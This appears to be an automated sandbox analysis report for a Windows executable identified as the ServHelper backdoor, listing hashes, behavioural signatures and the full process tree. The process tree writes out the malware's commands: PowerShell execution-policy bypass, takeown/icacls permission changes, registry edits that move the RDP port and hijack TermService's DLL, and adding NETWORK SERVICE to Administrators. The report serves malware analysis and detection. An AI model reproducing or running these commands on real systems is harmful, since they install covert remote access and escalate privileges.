Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
30-03-2024 21:36
Static task
static1
Behavioral task
behavioral1
Sample
44d42138d67d0e52c3c26cb726bc8f39_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
44d42138d67d0e52c3c26cb726bc8f39_JaffaCakes118.exe
Resource
win10v2004-20240226-en
General
-
Target
44d42138d67d0e52c3c26cb726bc8f39_JaffaCakes118.exe
-
Size
4.2MB
-
MD5
44d42138d67d0e52c3c26cb726bc8f39
-
SHA1
2613e0e464b334ed66e34a8cffc174c5603dd1d9
-
SHA256
074d3a0bcfb3d4b0b179a2495004fb95947de60ce002fded7af1d1781add9d2b
-
SHA512
9d59b4dfb96bbe5b59f1b5c0561dafd8fe3f2fb1ababf4e7a384577ddf63adb703802187e7a7bfd671c4fd67e84214bb2b3283edae85e0f2a424148d9e0be1fa
-
SSDEEP
98304:5RDQNYpuboTrhHZw1LhIArXs7YL8WVM872qAR:5RePbo3tZw17s7YQWg
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
pid Process 512 icacls.exe 448 icacls.exe 1068 icacls.exe 4948 icacls.exe 1016 takeown.exe 4784 icacls.exe 4836 icacls.exe 3692 icacls.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Modifies file permissions 1 TTPs 8 IoCs
pid Process 1068 icacls.exe 4948 icacls.exe 1016 takeown.exe 4784 icacls.exe 4836 icacls.exe 3692 icacls.exe 512 icacls.exe 448 icacls.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\rfxvmt.dll powershell.exe File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\shellbrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 5116 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 380 powershell.exe 380 powershell.exe 2176 powershell.exe 2176 powershell.exe 2696 powershell.exe 2696 powershell.exe 2968 powershell.exe 2968 powershell.exe 380 powershell.exe 380 powershell.exe 380 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 664 Process not Found -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 380 powershell.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeDebugPrivilege 2696 powershell.exe Token: SeDebugPrivilege 2968 powershell.exe Token: SeRestorePrivilege 4836 icacls.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4652 wrote to memory of 380 4652 44d42138d67d0e52c3c26cb726bc8f39_JaffaCakes118.exe 93 PID 4652 wrote to memory of 380 4652 44d42138d67d0e52c3c26cb726bc8f39_JaffaCakes118.exe 93 PID 4652 wrote to memory of 380 4652 44d42138d67d0e52c3c26cb726bc8f39_JaffaCakes118.exe 93 PID 380 wrote to memory of 1700 380 powershell.exe 97 PID 380 wrote to memory of 1700 380 powershell.exe 97 PID 380 wrote to memory of 1700 380 powershell.exe 97 PID 1700 wrote to memory of 2516 1700 csc.exe 98 PID 1700 wrote to memory of 2516 1700 csc.exe 98 PID 1700 wrote to memory of 2516 1700 csc.exe 98 PID 380 wrote to memory of 2176 380 powershell.exe 99 PID 380 wrote to memory of 2176 380 powershell.exe 99 PID 380 wrote to memory of 2176 380 powershell.exe 99 PID 380 wrote to memory of 2696 380 powershell.exe 101 PID 380 wrote to memory of 2696 380 powershell.exe 101 PID 380 wrote to memory of 2696 380 powershell.exe 101 PID 380 wrote to memory of 2968 380 powershell.exe 103 PID 380 wrote to memory of 2968 380 powershell.exe 103 PID 380 wrote to memory of 2968 380 powershell.exe 103 PID 380 wrote to memory of 1016 380 powershell.exe 105 PID 380 wrote to memory of 1016 380 powershell.exe 105 PID 380 wrote to memory of 1016 380 powershell.exe 105 PID 380 wrote to memory of 4784 380 powershell.exe 106 PID 380 wrote to memory of 4784 380 powershell.exe 106 PID 380 wrote to memory of 4784 380 powershell.exe 106 PID 380 wrote to memory of 4836 380 powershell.exe 107 PID 380 wrote to memory of 4836 380 powershell.exe 107 PID 380 wrote to memory of 4836 380 powershell.exe 107 PID 380 wrote to memory of 3692 380 powershell.exe 108 PID 380 wrote to memory of 3692 380 powershell.exe 108 PID 380 wrote to memory of 3692 380 powershell.exe 108 PID 380 wrote to memory of 512 380 powershell.exe 109 PID 380 wrote to memory of 512 380 powershell.exe 109 PID 380 wrote to memory of 512 380 powershell.exe 109 PID 380 wrote to memory of 448 380 powershell.exe 110 PID 380 wrote to memory of 448 380 powershell.exe 110 PID 380 wrote to memory of 448 380 powershell.exe 110 PID 380 wrote to memory of 1068 380 powershell.exe 111 PID 380 wrote to memory of 1068 380 powershell.exe 111 PID 380 wrote to memory of 1068 380 powershell.exe 111 PID 380 wrote to memory of 4948 380 powershell.exe 112 PID 380 wrote to memory of 4948 380 powershell.exe 112 PID 380 wrote to memory of 4948 380 powershell.exe 112 PID 380 wrote to memory of 1004 380 powershell.exe 113 PID 380 wrote to memory of 1004 380 powershell.exe 113 PID 380 wrote to memory of 1004 380 powershell.exe 113 PID 380 wrote to memory of 5116 380 powershell.exe 114 PID 380 wrote to memory of 5116 380 powershell.exe 114 PID 380 wrote to memory of 5116 380 powershell.exe 114 PID 380 wrote to memory of 1700 380 powershell.exe 115 PID 380 wrote to memory of 1700 380 powershell.exe 115 PID 380 wrote to memory of 1700 380 powershell.exe 115 PID 380 wrote to memory of 2056 380 powershell.exe 116 PID 380 wrote to memory of 2056 380 powershell.exe 116 PID 380 wrote to memory of 2056 380 powershell.exe 116 PID 2056 wrote to memory of 2664 2056 net.exe 117 PID 2056 wrote to memory of 2664 2056 net.exe 117 PID 2056 wrote to memory of 2664 2056 net.exe 117 PID 380 wrote to memory of 4016 380 powershell.exe 118 PID 380 wrote to memory of 4016 380 powershell.exe 118 PID 380 wrote to memory of 4016 380 powershell.exe 118 PID 4016 wrote to memory of 1652 4016 cmd.exe 119 PID 4016 wrote to memory of 1652 4016 cmd.exe 119 PID 4016 wrote to memory of 1652 4016 cmd.exe 119 PID 1652 wrote to memory of 3368 1652 cmd.exe 120
Processes
-
C:\Users\Admin\AppData\Local\Temp\44d42138d67d0e52c3c26cb726bc8f39_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\44d42138d67d0e52c3c26cb726bc8f39_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xqyi0fib\xqyi0fib.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES739A.tmp" "c:\Users\Admin\AppData\Local\Temp\xqyi0fib\CSC455D4C1CA22743DA8EE357F64CF89BF9.TMP"4⤵PID:2516
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1016
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4784
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4836
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3692
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:512
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:448
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1068
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:5116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1700
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2664
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵PID:3368
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:3696
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:4956
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵PID:4476
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵PID:4560
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:744
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:4480
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2100
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5bc05d33040ce82452fb6edeaa1766d7d
SHA1d3b3f5179ba50161513be4f88d0aa9cf2da15caa
SHA256a652b212da4d5d0d719871475d35638515d08732ac059153556f6443a071078f
SHA5123343ef13c176549ee95e306c33eb04aeeb9acbf90977a4c33cfd07754975d657fb226a54c653504c3c44b162ef3efe4d315c647e37a86cbe6142743b0a381094
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.5MB
MD5794bf0ae26a7efb0c516cf4a7692c501
SHA1c8f81d0ddd4d360dcbe0814a04a86748f99c6ff2
SHA25697753653d52aaa961e4d1364b5b43551c76da9bb19e12f741bd67c986259e825
SHA51220c97972a1256375157f82a859ce4936613fe109d54c63bbec25734edc3a567ca976b342a21ef5f25571b3c1959afe618ad9f9f17a817cfd731d1504541b1a75
-
Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
Filesize
3KB
MD5933b1cefbd8ab2decc405584c6bb30a5
SHA1b6e267b334a1129b01a0ef1be5f780f3c87b5bd3
SHA25640f7c726c920edb3273860f70b59987df45ca7f6a9e4261567606d13cf1459b3
SHA512bb1acaaa89f551b8248b19980f4abfa10f7c0f39ad2428db37bf04c1265e018423f61c31ae4ec7de333ce27ff4681388177779762d3b23f63abfd58362c34f70
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
Filesize
652B
MD51933719d0afc3c20b9ee34efa4933e30
SHA1a6552451ab820d9d1e32ea70377e215c7fb0be57
SHA256e158ac1e3a7d5a72c8c287cb4153e6b371de8e53c8682fc1fd0e140ea93e4f0c
SHA512ee0820f29abd1ad965b37560745b2f2c8b0819bdbcd5afc688554ae807b826084557b2fc744f2a9e3be6c81911c40ded1f45700e096ea91b080e0973cdc5997b
-
Filesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
Filesize
369B
MD5c30becf68973b117ec216a7eb811bf4d
SHA1163d5a10730d119e3e9ad05a678977c6a0337707
SHA256552815da09c61aa33452100f558d0c1a58cde0fbd7eced94375e04badb2db5ac
SHA51240ca7100ba0e43a7e8ae1cc8cc8c5389d0d7d2423fee669b46f4e06a9071b345a01ab3024f100c707a04bc810fc5c05ac0151b00f567b56b6ea145905bf6d630